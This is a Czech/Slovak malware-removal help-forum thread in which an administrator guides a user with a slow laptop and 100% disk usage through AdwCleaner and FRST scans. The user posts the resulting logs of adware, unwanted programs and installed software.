Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Disk 100%

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Odpovědět
Zpráva
Autor
alfonz.flower
Návštěvník
Návštěvník
Příspěvky: 71
Registrován: 20 říj 2019 16:46

Disk 100%

#1 Příspěvek od alfonz.flower »

Dobry den,

mam problem s NTB, ktory sa strasne spomalil Vsimol som si vyuzitie disku na 100% aj keď nic nerobi. Prosim o kontrolu.
Přílohy
scan.rar
(23.14 KiB) Staženo 49 x

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118195
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Disk 100%

#2 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

alfonz.flower
Návštěvník
Návštěvník
Příspěvky: 71
Registrován: 20 říj 2019 16:46

Re: Disk 100%

#3 Příspěvek od alfonz.flower »

1.

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted Preinstalled.WildTangentGamesBundle File C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\ALOHA TRIPEAKS
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\FARM TO FORK COLLECTORS EDITION
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\GOVERNOR OF POKER 2 PREMIUM EDITION
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\JEWEL MATCH 3
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\KING ODDBALL
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\LUXOR EVOLVED
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\MAGIC ACADEMY
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\PEGGLE NIGHTS
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\PLANTS VS ZOMBIES - GAME OF THE YEAR
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\POLAR BOWLER 1ST FRAME
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\TRINKLIT SUPREME
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\ZUMAS REVENGE
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES
Deleted Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES\APP
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Classes\CLSID\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangent wildgames Master Uninstall
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGameProvider-acer-genres
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGameProvider-acer-main
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App
Deleted Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-acer
Deleted Preinstalled.WildTangentGamesBundle Registry HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Deleted Preinstalled.WildTangentGamesBundle Registry HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Deleted Preinstalled.WildTangentGamesBundle Registry HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Deleted Preinstalled.WildTangentGamesBundle Registry HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [12477 octets] - [29/03/2021 13:27:42]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

2.
# -------------------------------
# Malwarebytes AdwCleaner 8.2.0.0
# -------------------------------
# Build: 03-22-2021
# Database: 2021-03-29.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 03-29-2021
# Duration: 00:00:27
# OS: Windows 8.1
# Scanned: 31987
# Detected: 98


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Adware.pokki C:\ProgramData\Pokki
Adware.pokki C:\Users\Public\Pokki
PUP.Optional.Booking C:\Program Files\Booking.com
PUP.Optional.Legacy C:\Program Files\Earth Networks
PUP.Optional.Legacy C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform

***** [ Files ] *****

Adware.pokki C:\Users\Alžbeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Pokki Start Menu.lnk
Adware.pokki C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pokki Start Menu.lnk
PUP.Optional.Booking C:\Users\Alžbeta\Favorites\Booking.com.url
PUP.Optional.PCAppStore C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC App Store.lnk

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

PUP.Optional.Legacy C:\Windows\System32\Tasks\SWEETLABS APP PLATFORM

***** [ Registry ] *****

Adware.pokki HKCU\Software\Classes\AllFileSystemObjects\shell\pokki
Adware.pokki HKCU\Software\Classes\Directory\shell\pokki
Adware.pokki HKCU\Software\Classes\Drive\shell\pokki
Adware.pokki HKCU\Software\Classes\lnkfile\shell\pokki
Adware.pokki HKCU\Software\Classes\pokki
Adware.pokki HKCU\Software\SweetLabs App Platform
PUP.Adware.Heuristic HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TBDEn|SBOEM2
PUP.Optional.InstallCore HKCU\Software\csastats
PUP.Optional.Legacy HKCU\Software\Earth Networks
PUP.Optional.Legacy HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\SweetLabs_AP
PUP.Optional.Legacy HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\SweetLabs_Start_Menu
PUP.Optional.Legacy HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E47A6CB5-E87A-4C99-A73D-C0CC752EC045}
PUP.Optional.Legacy HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SweetLabs App Platform
PUP.Optional.ProductSetup.A HKCU\Software\PRODUCTSETUP

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

Preinstalled.ACERAOPFramework Folder C:\Program Files (x86)\ACER\AOP FRAMEWORK
Preinstalled.ACERAOPFramework Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|BacKGround Agent
Preinstalled.ACERAOPFramework Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{4A37A114-702F-4055-A4B6-16571D4A5353}
Preinstalled.ACERClear.fiShellExtension Registry HKLM\Software\Classes\CLSID\{ED32C084-BABB-11E1-B491-D4D66088709B}
Preinstalled.ACERClear.fiShellExtension Registry HKLM\Software\Wow6432Node\\Classes\CLSID\{ED32C084-BABB-11E1-B491-D4D66088709B}
Preinstalled.AcerCareCenter File C:\Users\Public\Desktop\Acer Care Center.lnk
Preinstalled.AcerCareCenter Folder C:\Program Files (x86)\ACER\CARE CENTER
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74AFA71D-589E-4046-8826-36F0322AD707}
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74AFA71D-589E-4046-8826-36F0322AD707}
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACCAgent
Preinstalled.AcerCareCenter Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{A424844F-CDB3-45E2-BB77-1DDE4A091E76}
Preinstalled.AcerCareCenter Task C:\Windows\System32\Tasks\ACCAGENT
Preinstalled.AcerDocsOfficeAddIn Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{DCBF3379-246B-47E1-8173-639B63940838}
Preinstalled.AcerExplorerAgent Folder C:\Program Files\ACER\ACER EXPLORER AGENT
Preinstalled.AcerExplorerAgent Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4D0F42CF-1693-43D9-BDC8-19141D023EE0}
Preinstalled.AcerPortal Folder C:\Program Files (x86)\ACER\ACER PORTAL
Preinstalled.AcerPortal Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|AcerPortal
Preinstalled.AcerPortal Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}
Preinstalled.AcerPowerManagement Folder C:\Program Files\ACER\ACER POWER MANAGEMENT
Preinstalled.AcerQuickAccess File C:\Users\Alžbeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Acer Quick Access.lnk
Preinstalled.AcerQuickAccess Folder C:\Program Files\ACER\ACER QUICK ACCESS
Preinstalled.AcerQuickAccess Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E09CEB12-3785-4ECD-8EB7-2C45CD3F05D3}
Preinstalled.AcerQuickAccess Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Quick Access
Preinstalled.AcerQuickAccess Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{C1FA525F-D701-4B31-9D32-504FC0CF0B98}
Preinstalled.AcerQuickAccess Task C:\Windows\System32\Tasks\QUICK ACCESS
Preinstalled.AcerUEIPFramework Folder C:\Program Files\ACER\USER EXPERIENCE IMPROVEMENT PROGRAM\FRAMEWORK
Preinstalled.AcerUEIPFramework Folder C:\Program Files\ACER\USER EXPERIENCE IMPROVEMENT PROGRAM\PLUGIN\APPMONITOR
Preinstalled.AcerUEIPFramework Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6A641CAF-F63D-4EB5-8886-D62C1BD2457C}
Preinstalled.AcerUEIPFramework Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UbtFrameworkService
Preinstalled.AcerUEIPFramework Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{12A718F2-2357-4D41-9E1F-18583A4745F7}
Preinstalled.AcerUEIPFramework Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{978724F6-1863-4DD5-9E66-FB77F5AB5613}
Preinstalled.AcerUEIPFramework Task C:\Windows\System32\Tasks\UBTFRAMEWORKSERVICE
Preinstalled.AcerUpdater Folder C:\ProgramData\ACER\ACER UPDATER
Preinstalled.AcerabBox Registry HKLM\Software\Classes\CLSID\{5CCE71FA-9F61-4F24-9CD1-98D819B40D68}
Preinstalled.AcerabDocs File C:\Users\Public\Desktop\abDocs.lnk
Preinstalled.AcerabDocs Folder C:\Program Files (x86)\ACER\ABDOCS
Preinstalled.AcerabDocs Folder C:\Program Files (x86)\ACER\ABDOCS OFFICE ADDIN
Preinstalled.AcerabDocs Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0FC4D151-5326-4186-BF7D-3BF6513D0DEF}
Preinstalled.AcerabDocs Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\abDocsDllLoader
Preinstalled.AcerabDocs Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}
Preinstalled.AcerabDocs Task C:\Windows\System32\Tasks\ABDOCSDLLLOADER
Preinstalled.GatewayPowerManagement Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF56A5CD-80D3-4B81-98F8-2E3BBBF68337}
Preinstalled.GatewayPowerManagement Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Power Management
Preinstalled.GatewayPowerManagement Task C:\Windows\System32\Tasks\POWER MANAGEMENT
Preinstalled.LenovoPowerDVD Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}
Preinstalled.LenovoPowerDVD Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}
Preinstalled.PackardBellPowerManagement Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{91F52DE4-B789-42B0-9311-A349F10E5479}
Preinstalled.WildTangentGamesBundle File C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\ALOHA TRIPEAKS
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\FARM TO FORK COLLECTORS EDITION
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\GOVERNOR OF POKER 2 PREMIUM EDITION
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\JEWEL MATCH 3
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\KING ODDBALL
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\LUXOR EVOLVED
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\MAGIC ACADEMY
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\PEGGLE NIGHTS
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\PLANTS VS ZOMBIES - GAME OF THE YEAR
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\POLAR BOWLER 1ST FRAME
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\TRINKLIT SUPREME
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES\ZUMAS REVENGE
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES\APP
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Classes\CLSID\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Ext\Preapproved\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangent wildgames Master Uninstall
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGameProvider-acer-genres
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGameProvider-acer-main
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-acer
Preinstalled.WildTangentGamesBundle Registry HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Preinstalled.WildTangentGamesBundle Registry HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Preinstalled.WildTangentGamesBundle Registry HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}
Preinstalled.WildTangentGamesBundle Registry HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7A97880C-7DD3-4C6E-8DE0-881B1FC02BE6}



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118195
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Disk 100%

#4 Příspěvek od Rudy »

Nálezy (kromě Preinstalled) smažte (dejte do karantény, restartujte a dejte nové logy FRSR+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

alfonz.flower
Návštěvník
Návštěvník
Příspěvky: 71
Registrován: 20 říj 2019 16:46

Re: Disk 100%

#5 Příspěvek od alfonz.flower »

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-03-2021
Ran by Alžbeta (30-03-2021 11:53:24)
Running from C:\install
Windows 8.1 (Update) (X64) (2016-11-09 14:06:26)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2055909378-1137603550-79369489-500 - Administrator - Disabled)
Alžbeta (S-1-5-21-2055909378-1137603550-79369489-1001 - Administrator - Enabled) => C:\Users\Alžbeta
Guest (S-1-5-21-2055909378-1137603550-79369489-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2055909378-1137603550-79369489-1003 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET Security (Enabled - Out of date) {89B55CC4-3881-78B2-11E2-479AE0371896}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: ESET Security (Enabled - Out of date) {32D4BD20-1EBB-773C-2B52-7CE89BB0522B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Firewall (Enabled) {B18EDDE1-72EE-79EA-3ABD-EEAF1EE45FED}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

abFiles (HKLM-x32\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 2.00.3006 - Acer Incorporated)
abMusic (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 3.01.2003.6 - Acer Incorporated)
abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 4.00.2001.1 - Acer Incorporated)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.8109 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.8108 - Acer Incorporated)
Acer Video Player (HKLM-x32\...\{B6846F20-4821-11E3-8F96-0800200C9A66}) (Version: 1.00.2010.3 - Acer Incorporated)
Aloha TriPeaks (HKLM-x32\...\WTA-5caf620f-4be1-4ff3-89c4-e79ee5c96713) (Version: 2.2.0.98 - WildTangent) Hidden
Apowersoft Online Launcher version 1.7.8 (HKLM-x32\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.7.8 - APOWERSOFT LIMITED)
Apowersoft Screen Capture Pro V1.4.7.15 (HKLM-x32\...\{eaee5526-f8bd-4d74-a24c-50e5b5f36521}_is1) (Version: 1.4.7.15 - APOWERSOFT LIMITED)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
Bejeweled 2 Deluxe (HKLM-x32\...\WTA-b2aea3f9-c579-42fe-a3ab-42e4b5cf896d) (Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
ByteFence Anti-Malware (HKLM-x32\...\ByteFence) (Version: 5.5.0.6 - Byte Technologies LLC) <==== ATTENTION
CyberLink PhotoDirector 3 (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.1.5524 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.4220 - CyberLink Corp.)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version: - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{B55DB65D-EF6E-4E04-89D5-B03603BF681B}) (Version: 4.4.5 - SEIKO EPSON CORPORATION)
ESET Security (HKLM\...\{4DC9121F-BA9A-4A87-A6CA-E53B4FBACB5A}) (Version: 14.0.22.0 - ESET, spol. s r.o.)
Farm to Fork Collector's Edition (HKLM-x32\...\WTA-214ed53c-3dcd-4d4c-8232-43c8433f325f) (Version: 3.0.2.59 - WildTangent) Hidden
Foxit PhantomPDF (HKLM-x32\...\{D4DF5498-C95C-4A02-9951-725FB2D7BC0D}) (Version: 6.0.121.624 - Foxit Corporation)
Genesys USB Mass Storage Device (HKLM-x32\...\{959B7F35-2819-40C5-A0CD-3C53B5FCC935}) (Version: 4.3.2.1 - Genesys Logic)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 89.0.4389.90 - Google LLC)
Governor of Poker 2 Premium Edition (HKLM-x32\...\WTA-66c727ad-cc6f-40d8-9ba4-07131b65db15) (Version: 3.0.2.59 - WildTangent) Hidden
Chromium (HKLM-x32\...\{9A507290-CAD0-A310-7B50-D390ABD00010}) (Version: - )
Chromium (HKU\.DEFAULT\...\Chromium) (Version: 58.0.2991.0 - Chromium)
iCloud (HKLM\...\{28ABC5D7-AF47-4476-A6AA-C2DD822ED40F}) (Version: 7.9.0.9 - Apple Inc.)
Intel(R) Chipset Device Software (HKLM-x32\...\{f5d71765-7cd1-4e68-998f-5b379e725da3}) (Version: 10.0.22 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3855 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.9.0.1001 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.226.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{66614300-cd9b-4a62-8b18-c97e9562dc3e}) (Version: 19.50.0 - Intel Corporation)
Jewel Match 3 (HKLM-x32\...\WTA-848be79e-1768-41be-850b-a0612f115941) (Version: 3.0.2.59 - WildTangent) Hidden
Kerio Connect (HKLM\...\{03cc2f97-0f12-4fa3-a271-8c19ea5b81a8}) (Version: 9.2.3868 - Kerio Technologies Inc.)
King Oddball (HKLM-x32\...\WTA-daed0af3-d295-4bb8-9dca-bba4d57e857b) (Version: 3.0.2.48 - WildTangent) Hidden
LUXOR Evolved (HKLM-x32\...\WTA-d3ce2254-aee5-4067-a165-afae445b3b5d) (Version: 2.2.0.98 - WildTangent) Hidden
Magic Academy (HKLM-x32\...\WTA-8c2c3d55-80c9-4e05-a7fa-8a1e229dd22e) (Version: 2.2.0.98 - WildTangent) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 83.0.478.50 - Microsoft Corporation)
Microsoft Office 2013 Professional Plus (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\OneDriveSetup.exe) (Version: 21.030.0211.0002 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Teams) (Version: 1.4.00.7174 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
